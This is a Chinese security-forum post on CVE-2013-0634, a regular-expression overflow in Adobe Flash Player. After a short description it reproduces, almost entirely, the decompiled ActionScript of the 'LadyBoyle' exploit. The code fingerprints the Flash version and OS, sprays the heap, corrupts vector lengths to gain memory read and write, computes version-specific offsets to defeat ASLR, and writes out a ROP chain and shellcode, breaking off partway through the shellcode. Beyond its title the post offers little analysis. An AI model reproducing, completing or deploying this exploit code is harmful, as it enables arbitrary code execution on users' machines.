首页
论坛
专栏
课程

[新年快乐]CVE-2013-0634 POC Analysis

2013-2-12 02:02 8818

[新年快乐]CVE-2013-0634 POC Analysis

2013-2-12 02:02
8818
新年再不用微博就彻底落伍啦,欢迎互粉
http://weibo.com/u/2853226971
1. 漏洞描述
Adobe Flash Player ActionScript 3.0处理正则表达式存在溢出导致任意代码执行
且EXP技巧非常之高可绕过ASLR+DEP
2. 测试环境
Adobe Flash Player 11.5.502.146
Office 2010
Windows XP SP3
3. 漏洞分析
LadyBoyle ActionScript:
package
{
    import __AS3__.vec.*;
    import flash.display.*;
    import flash.media.*;
    import flash.net.*;
    import flash.system.*;
    import flash.text.*;
    import flash.utils.*;

    public class LadyBoyle extends Sprite
    {
        private var the_x32_Class:Class;
        private var the_x64_Class:Class;
        public var version:Object;

        public function LadyBoyle()
        {
            var _loc_2:* = null;
            var _loc_23:* = NaN;
            var _loc_24:* = null;
            var _loc_25:* = 0;
            var _loc_26:* = 0;
            var _loc_27:* = null;
            var _loc_28:* = null;
            var _loc_29:* = null;
            var _loc_30:* = null;
            var _loc_31:* = 0;
            var _loc_32:* = 0;
            var _loc_33:* = 0;
            var _loc_34:* = undefined;
            var _loc_35:* = null;
            var _loc_36:* = 0;
            var _loc_37:* = 0;
            var _loc_38:* = 0;
            var _loc_39:* = 0;
            var _loc_40:* = 0;
            this.the_x32_Class = LadyBoyle_the_x32_Class;
            this.the_x64_Class = LadyBoyle_the_x64_Class;
            this.version = Capabilities.version.toLowerCase().toString();
            var _loc_1:* = 0;
            var _loc_3:* = 0;
            var _loc_4:* = new ByteArray();
            var _loc_5:* = new Vector.<Object>(0);
            var _loc_6:* = new Sound();
            var _loc_7:* = 0;
            var _loc_8:* = 0;
            var _loc_9:* = 0;
            var _loc_10:* = 0;
            var _loc_11:* = 0;
            var _loc_12:* = 0;
            var _loc_13:* = 0;
            var _loc_14:* = 0;
            var _loc_15:* = 0;
            var _loc_16:* = 0;
            var _loc_17:* = _loc_4;
            switch(this.version)
            {
                case "win 11,5,502,146":
                {
                    break;
                }
                case "win 11,5,502,135":
                {
                    break;
                }
                case "win 11,5,502,110":
                {
                    break;
                }
                case "win 11,4,402,287":
                {
                    break;
                }
                case "win 11,4,402,278":
                {
                    break;
                }
                case "win 11,4,402,265":
                {
                    break;
                }
                default:
                {
                    return this.empty();
                    break;
                }
            }
            var _loc_18:* = SharedObject.getLocal("ImplentenstWell");
            if (SharedObject.getLocal("ImplentenstWell").size != 0)
            {
                _loc_23 = new Date().time - _loc_18.data.now;
                if (_loc_23 > 7 * 24 * 60 * 60 * 1000)
                {
                    _loc_18.close();
                }
                else
                {
                    return this.empty();
                }
            }
            var _loc_19:* = Capabilities.os.toLowerCase().toString();
            switch(_loc_19)
            {
                case "windows 7":
                {
                    break;
                }
                case "windows server 2008 r2":
                {
                    break;
                }
                case "windows server 2008":
                {
                    break;
                }
                case "windows server 2003 r2":
                {
                    break;
                }
                case "windows server 2003":
                {
                    break;
                }
                case "windows xp":
                {
                    break;
                }
                case "windows vista":
                {
                    break;
                }
                default:
                {
                    return this.empty();
                    break;
                }
            }
            _loc_1 = 0;
            while (_loc_1 < 0x4000)
            {
                
                _loc_24 = "";
                _loc_3 = 0;
                while (_loc_3 < 42)
                {
                    
                    _loc_24 = _loc_24 + String.fromCharCode(this.randRange(97, 122));
                    _loc_3 = _loc_3 + 1;
                }
                new Vector.<Object>(16)[0] = new RegExp(_loc_24, "");
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[1] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[2] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[3] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[4] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[5] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[6] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[7] = new Vector.<Number>(16);
                new Vector.<Number>(16)[0] = 0;
                new Vector.<Number>(16)[1] = 0;
                new Vector.<Number>(16)[2] = 0;
                new Vector.<Number>(16)[3] = 0;
                new Vector.<Number>(16)[4] = 0;
                new Vector.<Number>(16)[5] = 0;
                new Vector.<Number>(16)[6] = 0;
                new Vector.<Number>(16)[7] = 0;
                new Vector.<Number>(16)[8] = 0;
                new Vector.<Number>(16)[9] = 0;
                new Vector.<Number>(16)[10] = 0;
                new Vector.<Number>(16)[11] = 0;
                new Vector.<Number>(16)[12] = 0;
                new Vector.<Number>(16)[13] = 0;
                new Vector.<Number>(16)[14] = 0;
                new Vector.<Number>(16)[15] = 1;
                new Vector.<Object>(16)[8] = new Vector.<Number>(16);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[9] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[10] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[11] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[12] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[13] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[14] = new Vector.<Object>(32);
                new Vector.<Object>(32)[0] = null;
                new Vector.<Object>(32)[1] = _loc_6;
                new Vector.<Object>(32)[2] = _loc_4;
                new Vector.<Object>(32)[3] = _loc_4;
                new Vector.<Object>(32)[4] = _loc_4;
                new Vector.<Object>(32)[5] = _loc_4;
                new Vector.<Object>(32)[6] = _loc_4;
                new Vector.<Object>(32)[7] = _loc_4;
                new Vector.<Object>(32)[8] = _loc_4;
                new Vector.<Object>(32)[9] = _loc_4;
                new Vector.<Object>(32)[10] = _loc_4;
                new Vector.<Object>(32)[11] = _loc_4;
                new Vector.<Object>(32)[12] = _loc_4;
                new Vector.<Object>(32)[13] = _loc_4;
                new Vector.<Object>(32)[14] = _loc_4;
                new Vector.<Object>(32)[15] = _loc_4;
                new Vector.<Object>(32)[16] = _loc_4;
                new Vector.<Object>(32)[17] = _loc_4;
                new Vector.<Object>(32)[18] = _loc_4;
                new Vector.<Object>(32)[19] = _loc_4;
                new Vector.<Object>(32)[20] = _loc_4;
                new Vector.<Object>(32)[21] = _loc_4;
                new Vector.<Object>(32)[22] = _loc_4;
                new Vector.<Object>(32)[23] = _loc_4;
                new Vector.<Object>(32)[24] = _loc_4;
                new Vector.<Object>(32)[25] = _loc_4;
                new Vector.<Object>(32)[26] = _loc_4;
                new Vector.<Object>(32)[27] = _loc_4;
                new Vector.<Object>(32)[28] = _loc_4;
                new Vector.<Object>(32)[29] = _loc_4;
                new Vector.<Object>(32)[30] = _loc_4;
                new Vector.<Object>(32)[31] = _loc_4;
                new Vector.<Object>(16)[15] = new Vector.<Object>(32);
                _loc_5[_loc_1] = new Vector.<Object>(16);
                _loc_1 = _loc_1 + 1;
            }
            _loc_1 = 0x2012;
            while (_loc_1 < (0x4000 - 1))
            {
                
                if (_loc_1 % 2 != 0)
                {
                    _loc_5[_loc_1][2] = null;
                }
                _loc_1 = _loc_1 + 1;
            }
            _loc_2 = "(?i)()()(?-i)||||||||||||||||||||||";
            var _loc_20:* = new RegExp(_loc_2, "");
            var _loc_21:* = false;
            var _loc_22:* = 0;
            _loc_1 = 0;
            while (_loc_1 < 0x4000)
            {
                
                if (_loc_21)
                {
                    break;
                }
                _loc_8 = 1;
                while (_loc_8 <= 8)
                {
                    
                    try
                    {
                        if ((_loc_5[_loc_1][_loc_8] as Vector.<Number>).length > 17)
                        {
                            _loc_7 = _loc_1;
                            _loc_22 = _loc_8;
                            _loc_21 = true;
                            break;
                        }
                    }
                    catch (e:Error)
                    {
                    }
                    _loc_8 = _loc_8 + 1;
                }
                _loc_1 = _loc_1 + 1;
            }
            if (!_loc_21)
            {
                while (1)
                {
                    
                }
            }
            if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17)[0] == 16)
            {
                _loc_9 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17)[1];
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[17] = this.UintToDouble(0xffffffff, _loc_9);
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[18] = this.UintToDouble(0x41414141, 0);
                _loc_21 = false;
                _loc_1 = 0;
                while (_loc_1 < 0x4000)
                {
                    
                    if (_loc_21)
                    {
                        break;
                    }
                    _loc_8 = 1;
                    while (_loc_8 <= 8)
                    {
                        
                        try
                        {
                            if (this.ReadDouble(_loc_5[_loc_1][_loc_8] as Vector.<Number>, 0)[0] == 0x41414141)
                            {
                                _loc_7 = _loc_1;
                                _loc_22 = _loc_8;
                                _loc_21 = true;
                                break;
                            }
                        }
                        catch (e:Error)
                        {
                        }
                        _loc_8 = _loc_8 + 1;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                if (!_loc_21)
                {
                    while (1)
                    {
                        
                    }
                }
                (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffed] = this.UintToDouble(16, _loc_9);
                _loc_1 = 0;
                while (_loc_1 < 0x1000)
                {
                    
                    if (this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1)[1] == 32 && this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, (_loc_1 + 1))[0] == 1)
                    {
                        _loc_11 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, (_loc_1 + 1))[1] & 0xfffffff8;
                        _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_1 + 2)[0] & 0xfffffff8;
                        _loc_13 = _loc_12;
                        break;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                if (_loc_1 == 0x1000)
                {
                    (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
                    return;
                }
                _loc_1 = 0;
                while (_loc_1 < 0x4000)
                {
                    
                    _loc_8 = 1;
                    while (_loc_8 <= 8)
                    {
                        
                        if (!(_loc_1 == _loc_7 && _loc_8 == _loc_22))
                        {
                            _loc_5[_loc_1][_loc_8] = null;
                        }
                        _loc_8 = _loc_8 + 1;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                _loc_1 = 1;
                while (_loc_1 < 4)
                {
                    
                    _loc_29 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17 * _loc_1 + (_loc_1 - 1));
                    _loc_30 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, 17 * (_loc_1 + 1) + _loc_1);
                    if (_loc_29[1] == _loc_9 && _loc_30[1] == _loc_9 && _loc_29[1] < _loc_29[0] && _loc_30[1] < _loc_30[0] && _loc_30[0] - _loc_29[0] == 144)
                    {
                        _loc_10 = _loc_29[0] - 144 * (_loc_1 + 1);
                        break;
                    }
                    _loc_1 = _loc_1 + 1;
                }
                if (_loc_10 == 0)
                {
                    (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
                    return;
                }
                _loc_1 = 0;
                while (_loc_1 < 1024 * 100)
                {
                    
                    _loc_17.writeUnsignedInt(0x41414141);
                    _loc_1 = _loc_1 + 1;
                }
                _loc_15 = (_loc_12 + 64 - _loc_10 - 8) / 8;
                _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_15 = (_loc_12 + 8 - _loc_10 - 8) / 8;
                _loc_12 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_12 = _loc_12 + _loc_17.position;
                _loc_14 = _loc_17.position;
                _loc_15 = (_loc_11 - _loc_10 - 8) / 8;
                _loc_16 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                _loc_25 = 0;
                _loc_26 = 0;
                _loc_27 = Capabilities.version.toLowerCase();
                switch(_loc_27)
                {
                    case "win 11,5,502,146":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x1c0dc8;
                            _loc_26 = _loc_16 - 0x8c500;
                        }
                        break;
                    }
                    case "win 11,5,502,135":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x2293ab;
                            _loc_26 = _loc_16 - 0x8c590;
                        }
                        break;
                    }
                    case "win 11,5,502,110":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x186a6e;
                            _loc_26 = _loc_16 - 0x8c3d8;
                        }
                        break;
                    }
                    case "win 11,4,402,287":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x469196;
                            _loc_26 = _loc_16 - 0x8c2f4;
                        }
                        break;
                    }
                    case "win 11,4,402,278":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x12bca1;
                            _loc_26 = _loc_16 - 0x8c1b4;
                        }
                        break;
                    }
                    case "win 11,4,402,265":
                    {
                        if (Capabilities.playerType.toLowerCase() == "activex")
                        {
                            _loc_25 = _loc_16 - 0x78f07b;
                            _loc_26 = _loc_16 - 0x8c1b4;
                        }
                        break;
                    }
                    default:
                    {
                        (_loc_5[_loc_7][_loc_22] as Vector.<Number>)[0x1fffffff] = this.UintToDouble(16, _loc_9);
                        return;
                        break;
                    }
                }
                if (_loc_27 == "win 11,5,502,110" || _loc_27 == "win 11,5,502,135" || _loc_27 == "win 11,5,502,146")
                {
                    _loc_15 = (_loc_26 - _loc_10 - 8) / 8;
                    _loc_26 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[0];
                }
                else
                {
                    _loc_15 = (_loc_26 - 4 - _loc_10 - 8) / 8;
                    _loc_26 = this.ReadDouble(_loc_5[_loc_7][_loc_22] as Vector.<Number>, _loc_15)[1];
                }
                _loc_17.endian = Endian.LITTLE_ENDIAN;
                _loc_17.position = _loc_17.position + 112;
                _loc_17.writeUnsignedInt(_loc_25);
                _loc_17.position = _loc_17.position - 112 - 4;
                _loc_17.writeUnsignedInt(_loc_26); // ROP Chain
                _loc_17.writeUnsignedInt(_loc_12 + 136);
                _loc_17.writeUnsignedInt(_loc_12);
                _loc_17.writeUnsignedInt(0x2000);
                _loc_17.writeUnsignedInt(0x1000);
                _loc_17.writeUnsignedInt(64);
                _loc_17.position = _loc_17.position + 112;
                _loc_17.writeUnsignedInt(0xec8390cc);
                _loc_17.writeUnsignedInt(0x64db3370);
                _loc_17.writeUnsignedInt(0x8b185b8b);
                _loc_17.writeUnsignedInt(0x5b8b305b);
                _loc_17.writeUnsignedInt(0x1c5b8b0c);
                _loc_17.writeUnsignedInt(0x8b08538b);
                _loc_17.writeUnsignedInt(0x7c8b3c7a);
                _loc_17.writeUnsignedInt(0xbc8d2c3a);
                _loc_17.writeUnsignedInt(0xe0003a);
                _loc_17.writeUnsignedInt(0x408bb800);
                _loc_17.writeUnsignedInt(0x739c330);
                _loc_17.writeUnsignedInt(0xeb470374);
                _loc_17.writeUnsignedInt(0x68ef8bf9);
                _loc_17.writeUnsignedInt(0x6c0065);
                _loc_17.writeUnsignedInt(0x6e007268);
                _loc_17.writeUnsignedInt(0x6b6800);
                _loc_17.writeUnsignedInt(0x33fc0065);
                _loc_17.writeUnsignedInt(0x8b1b8bc9);
                _loc_17.writeUnsignedInt(0x207b8bf4);
                _loc_17.writeUnsignedInt(0xa7f303b1);
                _loc_17.writeUnsignedInt(0x5b8bf375);
                _loc_17.writeUnsignedInt(0x3c538b08);
                _loc_17.writeUnsignedInt(0x781a548b);
                _loc_17.writeUnsignedInt(0xec1a448d);
                _loc_17.writeUnsignedInt(0x548bd5ff);
                _loc_17.writeUnsignedInt(0xd303201a);
                _loc_17.writeUnsignedInt(0xc933c303);
                _loc_17.writeUnsignedInt(0x10e8);
                _loc_17.writeUnsignedInt(0x74655300);
                _loc_17.writeUnsignedInt(0x65726854);
                _loc_17.writeUnsignedInt(0x6f436461);
                _loc_17.writeUnsignedInt(0x7865746e);
                _loc_17.writeUnsignedInt(0x24348b74);
